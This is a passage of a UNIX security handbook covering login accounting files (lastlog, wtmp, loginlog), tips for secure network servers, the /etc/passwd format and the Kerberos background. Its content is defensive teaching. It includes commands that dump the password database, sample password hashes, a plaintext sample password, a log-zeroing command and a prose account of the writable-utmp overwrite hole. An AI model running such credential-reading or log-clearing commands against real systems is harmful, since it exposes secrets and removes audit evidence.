interpret). On the other hand, if you have a problem, the more logging you have, the more likely you will be able to<br />

determine what happened. Therefore, review the documentation for the audit tools provided with your system if it<br />

claims C2 audit capabilities, and experiment with them to determine if you want to enable the data collection.<br />
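As a concrete illustration, here is a hedged sketch of what enabling and examining C2-style auditing looks like on one vendor's system, Solaris, where the facility is called the Basic Security Module (BSM). The command names and paths below are Solaris-specific and may differ between releases; treat them as an example of the kind of tools to look for in your own documentation, not as a recipe:

# /etc/security/bsmconv
# auditconfig -getcond
# praudit /var/audit/*

The first command converts the system to use BSM auditing (it requires a reboot), the second reports whether auditing is currently active, and the third prints the binary audit trail in a human-readable form.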

10.1.1 lastlog File<br />

<strong>UNIX</strong> records the last time that each user logged into the system in the lastlog log file. This time is displayed each<br />

time you log in:<br />

login: tim<br />

password: books2sell<br />

Last login: Tue Jul 12 07:49:59 on tty01<br />

This time is also reported when the finger command is used:<br />

% finger tim<br />


Login name: tim In real life: Tim Hack<br />

Directory: /Users/tim Shell: /bin/csh<br />

Last login Tue Jul 12 07:49:59 on tty01<br />

No unread mail<br />

No Plan.<br />

%<br />

Some versions of System V <strong>UNIX</strong> display both the last successful login and the last unsuccessful login when a user<br />

logs into the system:<br />

login: tim<br />

password: books2sell<br />

Last successful login for tim : Tue Jul 12 07:49:59 on tty01<br />

Last unsuccessful login for tim : Tue Jul 06 09:22:10 on tty01<br />

Teach your users to check the last login time each time they log in. If the displayed time doesn't correspond to the<br />

last time they used the system, somebody else might have been using their account. If this happens, the user should<br />

immediately change the account's password and notify the system administrator.<br />

Unfortunately, the design of the lastlog mechanism is such that the previous contents of the file are overwritten at<br />

each login. As a result, if a user is inattentive for even a moment, or if the login message clears the screen, the user<br />

may not notice a suspicious time. Furthermore, even if a suspicious time is noted, it is no longer available for the<br />

system administrator to examine.<br />

One way to compensate for this design flaw is to have a cron-spawned task periodically make an on-disk copy of the<br />

file that can be examined at a later time. For instance, you could have a shell file run every six hours to do the<br />

following:<br />

mv /var/adm/lastlog.3 /var/adm/lastlog.4<br />

mv /var/adm/lastlog.2 /var/adm/lastlog.3<br />

mv /var/adm/lastlog.1 /var/adm/lastlog.2<br />

cp /var/adm/lastlog /var/adm/lastlog.1<br />

This will preserve the contents of the file in six-hour periods. If backups are done every day, then they will also be<br />

preserved in the backups for examination later.<br />
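For example, if you placed those four commands in a small script (the name /usr/local/adm/rotate-lastlog below is purely hypothetical), a root crontab entry such as the following would run it every six hours:

0 0,6,12,18 * * * /usr/local/adm/rotate-lastlog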

If you have saved copies of the lastlog file, you will need a way to read the contents. Unfortunately, there is no<br />

utility under standard versions of <strong>UNIX</strong> that allows you to read one of these files and print all the information.<br />

Therefore, you need to write your own. The following Perl script will work on SunOS systems, and you can modify<br />

it to work on others.[3]<br />

[3] The layout of the lastlog file is usually documented in an include file such as /usr/include/lastlog.h<br />

Example 10.1: Script that Reads lastlog File.

#!/usr/local/bin/perl
#
# Print the contents of a lastlog file (default: /var/adm/lastlog).

$fname = (shift || "/var/adm/lastlog");
$halfyear = 60*60*24*365.2425/2;        # pedantry abounds

# Build a table mapping UIDs to login names.
setpwent;
while (($name, $junk, $uid) = getpwent) {
    $names{$uid} = $name;
}
endpwent;

# lastlog is indexed by UID; on SunOS each 28-byte record holds a
# 4-byte time, an 8-byte terminal line, and a 16-byte hostname.
open(LASTL, $fname);
for ($uid = 0; read(LASTL, $record, 28); $uid++) {
    ($time, $line, $host) = unpack('l A8 A16', $record);
    next unless $time;
    $host = "($host)" if $host;
    ($sec, $min, $hour, $mday, $mon, $year) = localtime($time);
    $year += 1900 + ($year < 70 ? 100 : 0);
    $mon++;                             # localtime returns the month as 0-11
    print $names{$uid}, " ", $line, " $mday/$mon";
    print(((time - $time) > $halfyear) ? "/$year" : " $hour:$min");
    print " $host\n";
}
close LASTL;

This program starts by checking for a command-line argument (the "shift"); if none is present, it uses the default. It<br />

then calculates the number of seconds in half a year, to be used to determine the format of the output (logins more<br />

than six months in the past are printed differently). Next, it builds an associative array of UIDs to login names.<br />

After this initialization, the program reads a record at a time from the lastlog file. Each binary record is then<br />

unpacked and decoded. The stored time is decoded into something more understandable, and then the output is<br />

printed.<br />
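For example, if you saved the script under the (hypothetical) name lastlogdump and made it executable, you could examine either the live file or one of the rotated copies made earlier:

% lastlogdump
% lastlogdump /var/adm/lastlog.1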

While the lastlog file is designed to provide quick access to the last time that a person logged into the system, it does<br />

not provide a detailed history recording the use of each account. For that, <strong>UNIX</strong> uses the wtmp log file.<br />

10.1.2 utmp and wtmp Files<br />

<strong>UNIX</strong> keeps track of who is currently logged into the system with a special file called /etc/utmp. This is a binary file<br />

that contains a record for every active tty line, and generally does not grow to be more than a few kilobytes in length<br />

(at the most). A second file, /var/adm/wtmp, keeps track of both logins and logouts. This file grows every time a<br />

user logs in or logs out, and can grow to be many megabytes in length unless it is pruned.<br />

In Berkeley-derived versions of UNIX, the entries in the utmp and wtmp files contain:

●   Name of the terminal device used for login
●   Username
●   Hostname that the connection originated from, if the login was made over a network
●   Time that the user logged on

In System V <strong>UNIX</strong>, the wtmp file is placed in /etc/wtmp and is also used for accounting. The AT&T System V.3.2<br />

utmp and wtmp entries contain:<br />

●   Username
●   Terminal line number
●   Device name
●   Process ID of the login shell
●   Code that denotes the type of entry
●   Exit status of the process


●   Time that the entry was made

The extended wtmpx file used by Solaris, IRIX, and other SVR4 UNIX operating systems includes the following:

●   Username (32 characters instead of 8)
●   inittab id (indicates the type of connection; see Appendix C, UNIX Processes)
●   Terminal name (32 characters instead of 12)
●   Device name
●   Process ID of the login shell
●   Code that denotes the type of entry
●   Exit status of the process
●   Time that the entry was made
●   Session ID
●   Unused bytes for future expansions
●   Remote host name (for logins that originated over a network)

<strong>UNIX</strong> programs that report the users that are currently logged into the system (who, whodo, w, users, and finger), do<br />

so by scanning the /etc/utmp file. The write command checks this file to see if a user is currently logged in, and<br />

determines which terminal he is using.<br />

The last program, which prints a detailed report of the times of the most recent user logins, does so by scanning the<br />

wtmp file.<br />

The ps command gives you a more accurate account of who is currently using your system than the who, whodo,<br />

users, and finger commands because under some circumstances, users can have processes running without having<br />

their usernames appear in the /etc/utmp or /var/adm/wtmp files. (For example, a user may have left a program<br />

running and then logged out, or used the rsh command instead of rlogin.)<br />

However, the commands who, users, and finger have several advantages over ps:

●   They often present their information in a format that is easier to read than the ps output.
●   They sometimes contain information not present in the ps output, such as the names of remote host origins.
●   They may run significantly faster than ps.

NOTE: The permissions on the /etc/utmp file are sometimes set to be writable by any user on many<br />

systems. This is ostensibly to allow various user programs that create windows or virtual terminals to<br />

show the user as "logged" into each window without requiring superuser privileges. Unfortunately, if<br />

this file is world-writable, then any user can edit her entry to show a different username or terminal in a<br />

who listing - or to show none at all. (She can also edit anybody else's entry to show whatever she<br />

wants!) It also is the source of an old security hole that keeps reappearing in various vendors' releases<br />

of <strong>UNIX</strong>: by changing the terminal name in this file to that of a sensitive file, an attacker can get<br />

system programs that write to user terminals (such as wall and biff) to overwrite the target with selected<br />

output. This can lead to compromise or damage.<br />

If your system has a mode -rw-rw-rw- /etc/utmp file, we recommend that you change it to remove the<br />

write access for nonowners. Then complain to your vendor for not fixing such an old and well-known<br />


flaw.<br />
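The check and the fix are both one-liners; the pathname below assumes that your system keeps the file in /etc, which is not universal:

% ls -l /etc/utmp
# chmod go-w /etc/utmp

The first command shows the current mode; if it ends in -rw-rw-rw-, the second (run as the superuser) removes write permission for the group and for other users.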

10.1.2.1 su command and /etc/utmp and /var/adm/wtmp files<br />

When you use the su command (see "su: Changing Who You Claim to Be" in Chapter 4, Users, Groups, and the<br />

Superuser), it creates a new process with both the process's real UID and effective UID altered. This gives you the<br />

ability to access another user's files, and run programs as the other user.<br />

However, because su does not change your entry in the /etc/utmp or the /var/adm/wtmp files, the finger command will<br />

continue to display the account to which you logged in, not the one that you su'ed to. Many other programs as well -<br />

such as mail - may not work properly when used from within a su subshell, as they determine your username from<br />

the /etc/utmp entry and not from the real or effective UID.<br />

Note that different versions of the su command have different options available that allow you to reset your<br />

environment, run a different command shell, or otherwise modify the default behavior. One common argument is a<br />

simple dash, as in "su - user". This form will cause the shell for user to start up as if it were a login shell.<br />

Thus, the su command should be used with caution. While it is useful for quick tests, because it does not properly<br />

update the utmp and wtmp files, it can cause substantial confusion to other users and to some system utilities.<br />
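You can see the discrepancy for yourself. In the hedged sketch below, ruth is a hypothetical account:

% su ruth
Password:
% who am i
% id

The who am i command consults /etc/utmp and still reports the account you originally logged in as, while id reports the real and effective UIDs that the su subshell is actually running with.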

10.1.3 last Program<br />

Every time a user logs in or logs out, <strong>UNIX</strong> makes a record in the file wtmp. The last program displays the contents<br />

of this file in an understandable form.[4] If you run last with no arguments, the command displays all logins and<br />

logouts on every device. last will display the entire file; you can abort the display by pressing the interrupt character<br />

(usually CTRL-C):<br />

[4] On some SVR4 systems you can use the "who -a" command to view the contents of the wtmp file.<br />

Check your documentation to see which command version you would use on your system.<br />

% last<br />

dpryor ttyp3 std.com Sat Mar 11 12:21 - 12:24 (00:02)<br />

simsong ttyp2 204.17.195.43 Sat Mar 11 11:56 - 11:57 (00:00)<br />

simsong ttyp1 204.17.195.43 Sat Mar 11 11:37 still logged in<br />

dpryor console Wed Mar 8 10:47 - 17:41 (2+06:53)<br />

devon console Wed Mar 8 10:43 - 10:47 (00:03)<br />

simsong ttyp3 pleasant.cambrid Mon Mar 6 16:27 - 16:28 (00:01)<br />

dpryor ftp mac4 Fri Mar 3 16:31 - 16:33 (00:02)<br />

dpryor console Fri Mar 3 12:01 - 10:43 (4+22:41)<br />

simsong ftp pleasant.cambrid Fri Mar 3 08:40 - 08:56 (00:15)<br />

simsong ttyp2 pleasant.cambrid Thu Mar 2 20:08 - 21:08 (00:59)<br />

...<br />

In this display, you can see that five login sessions have been active since March 7th: simsong, dpryor, devon,<br />

dpryor (again), and simsong (again). Two of the users (dpryor and devon) logged on to the computer console. The<br />

main user of this machine is probably the user dpryor (in fact, this computer is a workstation sitting on dpryor's<br />

desk.) The terminal name ftp indicates that dpryor was logged in for FTP file transfer. Other terminal names may<br />

also appear here, depending on your system type and configuration; for instance, you might have an entry showing<br />

pc-nfs as an entry type.<br />

The last command allows you to specify a username or a terminal as an argument to prune the amount of<br />

information displayed. If you provide a username, last displays logins and logouts only for that user. If you provide<br />

a terminal name, last displays logins and logouts only for the specified terminal:<br />


% last dpryor<br />

dpryor ttyp3 std.com Sat Mar 11 12:21 - 12:24 (00:02)<br />

dpryor console Wed Mar 8 10:47 - 17:41 (2+06:53)<br />

dpryor ftp mac4 Fri Mar 3 16:31 - 16:33 (00:02)<br />

dpryor console Fri Mar 3 12:01 - 10:43 (4+22:41)<br />

dpryor ftp mac4 Mon Feb 27 10:43 - 10:45 (00:01)<br />

dpryor ttyp6 std.com Sun Feb 26 01:12 - 01:13 (00:01)<br />

dpryor ftp mac4 Thu Feb 23 14:42 - 14:43 (00:01)<br />

dpryor ftp mac4 Thu Feb 23 14:20 - 14:25 (00:04)<br />

dpryor ttyp3 mac4 Wed Feb 22 13:04 - 13:06 (00:02)<br />

dpryor console Tue Feb 21 09:57 - 12:01 (10+02:04)<br />

You may wish to issue the last command every morning to see if there were unexpected logins during the previous<br />

night.<br />

On some systems, the wtmp file also logs shutdowns and reboots.<br />
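If you would rather not depend on remembering to do this, a crontab entry can mail you a morning report automatically. The sketch below is an assumption: the path of last, the choice of mail command, and the number of lines worth reading all vary from site to site:

0 7 * * * /usr/bin/last | head -40 | mail root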

10.1.3.1 Pruning the wtmp file<br />

The wtmp file will continue to grow until you have no space left on your computer's hard disk. For this reason, many<br />

vendors include shell scripts with their <strong>UNIX</strong> releases that zero the wtmp file automatically on a regular basis (such<br />

as once a week or once a month). These scripts are run automatically by the cron program.<br />

For example, many monthly shell scripts contain a statement that looks like this:<br />

# zero the log file<br />

cat /dev/null >/var/adm/wtmp<br />

Instead of this simple-minded approach, you may wish to make a copy of the wtmp file first, so you'll be able to<br />

refer to logins in the previous month. To do so, you must locate the shell script that zeros your log file and add the<br />

following lines:<br />

# make a copy of the log file and zero the old one<br />

rm /var/adm/wtmp.old<br />

ln /var/adm/wtmp /var/adm/wtmp.old<br />

cp /dev/null /var/adm/wtmp.nul<br />

mv /var/adm/wtmp.nul /var/adm/wtmp<br />

Most versions of the last command allow you to specify a file to use other than wtmp by using the -f option. For<br />

example:<br />

% last -f /var/adm/wtmp.old<br />

Some versions of the last command do not allow you to specify a different wtmp file to search through. If you need<br />

to check this previous copy and you are using one of these systems, you will need to momentarily place the copy of<br />

the wtmp file back into its original location. For example, you might use the following shell script to do the trick:<br />

#!/bin/sh<br />

mv /var/adm/wtmp /var/adm/wtmp.real<br />

mv /var/adm/wtmp.old /var/adm/wtmp<br />

last $*<br />

mv /var/adm/wtmp /var/adm/wtmp.old<br />

mv /var/adm/wtmp.real /var/adm/wtmp<br />

This approach is not without its problems, however. Any logins and logouts will be logged to the wtmp.old file<br />

while the command is running.<br />


10.1.4 loginlog File<br />

If you are using a System V-based version of <strong>UNIX</strong> (including Solaris), you can log failed login attempts in a<br />

special file called /var/adm/loginlog.<br />

To log failed login attempts, you must specifically create this file with the following sequence of commands:<br />

# touch /var/adm/loginlog<br />

# chmod 600 /var/adm/loginlog<br />

# chown root /var/adm/loginlog<br />

After this file is created, <strong>UNIX</strong> will log all failed login attempts to your system. A "failed login attempt" is defined<br />

as a login attempt in which a user tries to log into your system but types a bad password five times in a row.<br />

Normally, System V <strong>UNIX</strong> hangs up on the caller (or disconnects the Telnet connection) after the fifth attempt. If<br />

this file exists, <strong>UNIX</strong> will also log the fact that five bad attempts occurred.<br />

The contents of the file look like this:<br />

# cat /var/adm/loginlog<br />

simsong:/dev/pts/8:Mon Nov 27 00:42:14 1995<br />

simsong:/dev/pts/8:Mon Nov 27 00:42:20 1995<br />

simsong:/dev/pts/8:Mon Nov 27 00:42:26 1995<br />

simsong:/dev/pts/8:Mon Nov 27 00:42:39 1995<br />

simsong:/dev/pts/8:Mon Nov 27 00:42:50 1995<br />

#<br />


Chapter 23
Writing Secure SUID and Network Programs

23.3 Tips on Writing Network Programs

If you are coding a new network service, there are also a number of pitfalls to consider. This is a partial<br />

list of concerns and advice for writing more secure network code:<br />

1.  Don't make any hard-coded assumptions about service port numbers.

    Use the library getservbyname() and related calls, plus system include files, to get important values. Remember that sometimes constants aren't constant.

2.  Don't place undue reliance on the fact that any incoming packets are from (or claim to be from) a low-numbered, privileged port.

    Any PC can send from those ports, and forged packets can claim to be from any port.

3.  Don't place undue reliance on the source IP address in the packets of connections you received.

    Such items may be forged or altered.

4.  Do a reverse lookup on connections when you need a hostname for any reason.

    After you have obtained a hostname to go with the IP address you have, do another lookup on that hostname to ensure that its IP address matches what you have. (A manual sketch of this double lookup appears after this list.)

5.  Include some form of load shedding or load limiting in your server to handle cases of excessive load.

    Consider what should happen if someone makes a concerted effort to direct a denial of service attack against your server. For example, you may wish to have a server stop processing incoming requests if the load goes over some predefined value.

6.  Put reasonable time-outs on each network-oriented read request.

    A remote server that does not respond quickly may be common, but one that does not respond for days may hang up your code awaiting a reply. This rule is especially important in TCP-based servers that may continue attempting delivery indefinitely.

7.  Put reasonable time-outs on each network write request.

    If some remote server accepts the first few bytes and then blocks indefinitely, you do not want it to lock up your code awaiting completion.


8.  Make no assumptions about the content of input data, no matter what the source is.

    For instance, do not assume that input is null-terminated, contains linefeeds, or is even in standard ASCII format. Your program should behave in a defined manner if it receives random binary data as well as expected input.

9.  Make no assumptions about the amount of input sent by the remote machine.

    Put in bounds checking on individual items read, and on the total amount of data read (see the sidebar for one reason why).

Getting More Than You Expected<br />

You must ensure that your programs, whether they run locally or over a network, properly handle<br />

extended and ill-defined input. We illustrate this point with an edited retelling of an anecdote<br />

related to one of us by Tsutomu Shimomura.<br />

One day, Shimomura noticed that a certain Department of Energy FTP server machine was set to<br />

finger any machine from which it received an anonymous FTP request. This bothered Shimomura<br />

a little, as anonymous FTP is more or less as the name implies. Why should the administrators of<br />

that site care? If who was on the machines connecting to theirs mattered, they shouldn't have put<br />

up anonymous FTP.<br />

This also piqued Shimomura's scientific curiosity, however. Were they using standard finger? He<br />

modified his local inetd configuration to point incoming finger requests to his character generator<br />

(chargen). He then connected to the remote FTP server and logged out again.<br />

Over the next few hours, Shimomura's machine shipped tens of megabytes of characters to the<br />

remote site. Eventually, late at night, the connection was broken. The remote machine no longer<br />

answered any network requests and appeared to have disappeared from the network. When it<br />

reappeared the next morning, the automatic finger-of-machines connection for FTP was no longer<br />

present.<br />

The moral of this little story is that if you are going to ask for something, be sure that you are able<br />

to handle anything that you might get.<br />

10. Consider doing a call to the authd service on the remote site to identify the putative source of the connection.

    However, remember not to place too much trust in the response.

11. Do not require the user to send a reusable password in cleartext over the network connection to authenticate himself.

    Either use one-time passwords, or some shared, secret method of authentication that does not require sending compromisable information across the network.

    For instance, the APOP protocol used in the POP mail service has the server send the client a unique character string, usually including the current date and time.[10] The client then hashes the timestamp together with the user's password. The result is sent back to the server. The server also has the password and performs the same operation to determine if there is a match. The password is never transmitted across the network. This approach is described further in the discussion of POP in Chapter 17, TCP/IP Services.


    [10] This string is usually referred to as a nonce.

12. Consider adding some form of session encryption to prevent eavesdropping and foil session hijacking.

    But don't try writing your own cryptography functions; see Chapter 6, Cryptography, for algorithms that are known to be strong.

13. Build in support to use a proxy.

    Consider using SOCKS (described in Chapter 22, Wrappers and Proxies) so that the code is firewall friendly.

14. Make sure that good logging is performed.

    This includes logging connections, disconnects, rejected connections, detected errors, and format problems.

15. Build in a graceful shutdown so that the system operator can signal the program to shut down and clean up sensitive materials.

    Usually, this process means trapping the TERM signal and cleaning up afterwards.

16. Consider programming a "heartbeat" log function in servers that can be enabled dynamically.

    This function will periodically log a message indicating that the server is still active and working correctly, and possibly record some cumulative activity statistics.

17. Build in some self-recognition or locking to prevent more than one copy of a server from running at a time.

    Sometimes, services are accidentally restarted, which may lead to race conditions and the destruction of logs if this is not recognized and stopped early.
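As a manual illustration of the double lookup recommended in item 4, you can perform the same cross-check with nslookup; the address below is simply the placeholder address that appeared in the earlier last listing. In a program you would typically call gethostbyaddr(), then call gethostbyname() on the name it returns and verify that the original address appears among the results:

% nslookup 204.17.195.43
% nslookup name.returned.by.the.first.query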


Chapter 3
Users and Passwords

3.2 Passwords

Once you've entered your username, <strong>UNIX</strong> typically prompts you to enter your password. This section<br />

describes how <strong>UNIX</strong> stores and handles passwords on most systems and how you can select a good<br />

password.<br />

3.2.1 The /etc/passwd File<br />

<strong>UNIX</strong> uses the /etc/passwd file to keep track of every user on the system. The /etc/passwd file contains the<br />

username, real name, identification information, and basic account information for each user. Each line in<br />

the file contains a database record; the record fields are separated by a colon (:).<br />

You can use the cat command to display your system's /etc/passwd file. Here are a few sample lines from<br />

a typical file:<br />

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh<br />

daemon:*:1:1::/tmp:<br />

uucp:OORoMN9FyZfNE:4:4::/var/spool/uucppublic:/usr/lib/uucp/uucico<br />

rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh<br />

arlin:f8fk3j1OIf34.:182:100:Arlin Steinberg:/u/arlin:/bin/csh<br />

The first three accounts, root, daemon, and uucp, are system accounts, while rachel and arlin are accounts<br />

for individual users.<br />

The individual fields of the /etc/passwd file have fairly straightforward meanings. Table 3.1 explains a sample line from the file shown above.

Table 3.1: Example /etc/passwd Fields

Field            Contents
rachel           The username
eH5/.mj7NB3dx    The user's "encrypted password"
181              The user's user identification number (UID)
100              The user's group identification number (GID)
Rachel Cohen     The user's full name (also known as the GECOS or GCOS field)[3]
/u/rachel        The user's home directory
/bin/ksh         The user's shell[4]


[3] When <strong>UNIX</strong> was first written, it ran on a small minicomputer. Many users at Bell Labs<br />

used their <strong>UNIX</strong> accounts to create batch jobs to be run via RJE (Remote Job Entry) on the<br />

bigger GECOS computer in the Labs. The user identification information for the RJE was<br />

kept in the /etc/passwd file as part of the standard user identification. GECOS stood for<br />

General Electric Computer Operating System; GE was one of several major companies that<br />

made computers around that time.<br />

[4] An empty field for the shell name does not mean that the user has no shell; instead, it<br />

means that the Bourne shell (/bin/sh) should be used as a default.<br />

Passwords are normally represented by a special encrypted format that is described in "The <strong>UNIX</strong><br />

Encrypted Password System" in Chapter 8, Defending Your Accounts; the password itself is not really<br />

stored in the file. Encrypted passwords may also be stored in separate shadow password files, which are<br />

also described in Chapter 8. The meanings of the UID and GID fields are described in Chapter 4, Users,<br />

Groups, and the Superuser.<br />
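Because the fields are separated by colons, standard tools can answer simple security questions about the file directly. For example, on a system that keeps its accounts in a traditional /etc/passwd, the following one-liner lists every account whose UID is 0, and that therefore has superuser privileges; with the sample file shown above, only root should appear:

% awk -F: '$3 == 0 {print $1}' /etc/passwd
root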

3.2.2 The /etc/passwd File and Network Databases<br />

These days, many organizations have moved away from large time-sharing computers and invested in<br />

large client/server networks containing many servers and dozens or hundreds of workstations. These<br />

systems are usually set up so that any user can make use of any workstation in a group or in the entire<br />

organization. When these systems are in use, every user effectively has an account on every workstation.<br />

Unfortunately, on these large, distributed systems, you cannot ensure that every computer has the same<br />

/etc/passwd file. For this reason, there are now several different commercial systems available that make<br />

the information stored in the /etc/passwd file available over a network.<br />

Four such systems are:

●   Sun Microsystems' Network Information System (NIS)
●   Sun Microsystems' NIS+
●   Open Software Foundation's Distributed Computing Environment (DCE)
●   NeXT Computer's NetInfo

All of these systems take the information that is usually stored in each workstation's /etc/passwd file and<br />

store it in one or more network server computers. If you are using one of these systems and wish to view<br />

the contents of the password database, you cannot simply cat the /etc/passwd file. Instead, you must use a<br />

command that is specific to your system.<br />

Sun's NIS service supplements the information stored in workstations' own files. If you are using NIS and<br />

you wish to get a list of every user account, you would use the following command:<br />

% cat /etc/passwd; ypcat passwd<br />

Sun's NIS+ service can be configured to supplement or substitute its user account entries for those entries<br />

in the /etc/passwd file, depending on the contents of the /etc/nsswitch.conf file. If you are using a system<br />


that runs NIS+, you will want to use the niscat command and specify your NIS+ domain. For example:<br />

% niscat -o passwd.bigco<br />

On machines running NetInfo, the local /etc/passwd file is ignored and the network version is used<br />

instead. Therefore, if you are using NetInfo and wish to see the user accounts, you only need to type:<br />

% nidump passwd /<br />

Computers that are using DCE use an encrypted network database system as an alternative to encrypted<br />

passwords and /etc/passwd files. However, in order to maintain compatibility, some of them have<br />

programs which run on a regular basis that create a local /etc/passwd file. You should check your manuals<br />

for information about your specific system.<br />

These network database systems are described in greater detail in Chapter 19, RPC, NIS, NIS+, and<br />

Kerberos.<br />

At many sites, the administrators prefer not to use network database management systems for fear that the<br />

system itself may somehow become compromised. This fear may result from the fact that configurations<br />

are often complex, and sometimes the protocols are not particularly resistant to attack. In these<br />

environments, the administrator simply keeps one central file of user information and then copies it to<br />

remote machines on a periodic basis (for example, using rdist). The drawback to this approach is that it<br />

often requires the administrator to intervene to change a user password or shell entry. In general, you<br />

should learn to master the configuration of the system supplied by your vendor and use it. You can then<br />

put other safeguards in place, such as those mentioned in Chapter 21, Firewalls, and in Chapter 22,<br />

Wrappers and Proxies.<br />

NOTE: Because there are so many different ways to access the information that has<br />

traditionally been stored in the /etc/passwd file, throughout this book we will simply use the<br />

phrase "password file" or "/etc/passwd" as a shorthand for the multitude of different systems.<br />

In the programming examples, we will use a special command called " cat-passwd" that<br />

prints the contents of the password database on standard output. On a traditional <strong>UNIX</strong><br />

system without shadow passwords, the cat-passwd command could simply be the command<br />

cat /etc/passwd. On a machine running NIS, it could be the command ypcat passwd. You<br />

could write such a program for yourself that would make repeated calls to the getpwent()<br />

library call and print the results.<br />
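A minimal Bourne shell sketch of such a cat-passwd script appears below. It assumes a traditional /etc/passwd plus an optional NIS map, and it uses ypwhich to test whether the host is currently bound to an NIS server; on a machine with shadow passwords, NIS+, NetInfo, or DCE you would substitute the appropriate commands (or the getpwent() loop mentioned above):

#!/bin/sh
# cat-passwd: print the contents of the password database on standard output

cat /etc/passwd

# If this host is bound to an NIS server, append the NIS passwd map as well.
if ypwhich >/dev/null 2>&1
then
        ypcat passwd
fi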

3.2.3 Authentication<br />

After you tell <strong>UNIX</strong> who you are, you must prove your identity. This process is called authentication.<br />

Classically, there are three different ways that you can authenticate yourself to a computer system, and<br />

you use one or more of them each time:<br />

1.  You can tell the computer something that you know (for example, a password).

2.  You can "show" the computer something you have (for example, a card key).

3.  You can let the computer measure something about you (for example, your fingerprint).

None of these systems is foolproof. For example, by eavesdropping on your terminal line, somebody can<br />


learn your password. By attacking you at gunpoint, somebody can steal your card key. And if your<br />

attacker has a knife, you might even lose your finger! In general, the more trustworthy the form of<br />

identification, the more troublesome the method is to use, and the more aggressive an attacker must be to<br />

compromise it.<br />

3.2.4 Passwords Are a Shared <strong>Sec</strong>ret<br />

Passwords are the simplest form of authentication: they are a secret that you share with the computer.<br />

When you log in, you type your password to prove to the computer that you are who you claim to be. The<br />

computer ensures that the password you type matches the account that you have specified. If they match,<br />

you are allowed to proceed.<br />

<strong>UNIX</strong> doesn't display your password as you type it. This gives you extra protection if you're using a<br />

printing terminal or if somebody is watching over your shoulder as you type.[5]<br />

[5] This is sometimes referred to as shoulder surfing.<br />

Passwords are normally <strong>UNIX</strong>'s first line of defense against outsiders who want to break into your system.<br />

Although you could break into a system or steal information through the network without first logging in,<br />

many break-ins result because of poorly chosen or poorly protected passwords.<br />

3.2.5 Why Use Passwords?<br />

Most desktop personal computers do not use passwords (although there are several third-party programs<br />

that do provide varying degrees of protection, and passwords are used by both the Windows and<br />

Macintosh network filesystems). The fact that the PC has no passwords makes the computer easier to use,<br />

both by the machine's primary user and by anybody else who happens to be in the area. People with PCs<br />

rely on physical security - doors, walls, and locks - to protect the information stored on their disks from<br />

vandals and computer criminals.<br />

Likewise, many of the research groups that originally developed the <strong>UNIX</strong> operating system did not have<br />

passwords for individual users - often for the same reason that they shied away from locks on desks and<br />

office doors. In these environments, trust, respect, and social convention were very powerful deterrents to<br />

information theft and destruction.<br />

But when a computer is connected to a modem that can be accessed from almost any place in the world<br />

that has a telephone, or when it is connected to a network that is used by people outside the immediate<br />

group, passwords on computer accounts become just as necessary as locks on the doors of a townhouse:<br />

without them, an intruder can come right in, unhindered, and wreak havoc. And indeed, in today's<br />

electronic world, there are numerous people who try the "front door" of every computer they can find. If<br />

the door is unlocked, sometimes the vandals will enter and do damage.<br />

Passwords are especially important on computers that are shared by several people, or on computers that<br />

are connected to networks where various computers have trust relationships with each other (we'll explain<br />

what this means in a later chapter). In such circumstances, a single easily compromised account can<br />

endanger the security of the entire installation or network.<br />


3.2.6 Conventional <strong>UNIX</strong> Passwords<br />

Today, most <strong>UNIX</strong> systems use simple passwords to authenticate users: the user knows a password, and<br />

types the password into the computer to log in.<br />

Conventional passwords have been part of <strong>UNIX</strong> since its early years. The advantage of this system is that<br />

it runs without any special equipment (such as card readers or fingerprint scanners).<br />

The disadvantage of conventional passwords is that they are easily foiled - especially if you log into your<br />

computer over a network. In recent years, conventional passwords have not provided dependable security<br />

in a networked environment: there are simply too many opportunities for a sophisticated attacker to<br />

capture a password and then use it at a later time.[6] Today, even unsophisticated attackers can launch<br />

these attacks, thanks to a variety of sophisticated tools available on the net. The only way to safely use a<br />

<strong>UNIX</strong> computer remotely over a network such as the <strong>Internet</strong> is to use either (or both) one-time passwords<br />

or data encryption (see Section 3.7, "One-Time Passwords," later in this chapter and in Chapter 8, and<br />

Chapter 6, Cryptography).<br />

[6] Passwords are still quite effective for most stand-alone systems with hard-wired<br />

terminals.<br />

Unfortunately, we live in an imperfect world, and most <strong>UNIX</strong> systems continue to depend on reusable<br />

passwords for user authentication. As such, passwords continue to be one of the most widely exploited<br />

methods of compromising <strong>UNIX</strong> systems on networks.<br />


Chapter 19
RPC, NIS, NIS+, and Kerberos

19.6 Kerberos

In 1983 the Massachusetts Institute of Technology, working with IBM and Digital Equipment<br />

Corporation, embarked on an eight-year project designed to integrate computers into the university's<br />

undergraduate curriculum. The project was called Project Athena.<br />

Athena began operation with nearly 50 traditional time-sharing minicomputers: Digital Equipment<br />

Corporation's VAX 11/750 systems running Berkeley 4.2 <strong>UNIX</strong>. Each VAX had a few terminals; when a<br />

student or faculty member wanted to use a computer, he or she sat down at one of its terminals.<br />

Within a few years, Athena began moving away from the 750s. The project received hundreds of<br />

high-performance workstations with big screens, fast computers, small disks, and Ethernet interfaces.<br />

The project's goal was to allow any user to sit down at any computer and enjoy full access to his files and<br />

to the network.<br />

Of course there were problems. As soon as the workstations were deployed, the problems of network<br />

eavesdropping became painfully obvious; with the network accessible from all over campus, nothing<br />

prevented students (or outside intruders) from running network spy programs. It was nearly impossible to<br />

prevent the students from learning the superuser password of the workstations or simply rebooting them<br />

in single-user mode. To further complicate matters, many of the computers on the network were IBM<br />

PC/ATS that didn't have even rudimentary internal computer security. Something had to be done to<br />

protect student files in the networked environment to the same degree that they were protected in the<br />

time-sharing environment.<br />

Athena's ultimate solution to this security problem was Kerberos, an authentication system that uses DES<br />

cryptography to protect sensitive information such as passwords on an open network. When the user logs<br />

in to a workstation running Kerberos, that user is issued a ticket from the Kerberos Server. The user's<br />

ticket can only be decrypted with the user's password; it contains information necessary to obtain<br />

additional tickets. From that point on, whenever the user wishes to access a network service, an<br />

appropriate ticket for that service must be presented. As all of the information in the Kerberos tickets is<br />

encrypted before it is sent over the network, the information is not susceptible to eavesdropping or<br />

misappropriation.<br />


19.6.1 Kerberos Authentication<br />

Kerberos authentication is based entirely on the knowledge of passwords that are stored on the Kerberos<br />

Server. Unlike <strong>UNIX</strong> passwords, which are encrypted with a one-way algorithm that cannot be reversed,<br />

Kerberos passwords are stored on the server encrypted with a conventional encryption algorithm - in this<br />

case, DES - so that they can be decrypted by the server when needed. A user proves her identity to the<br />

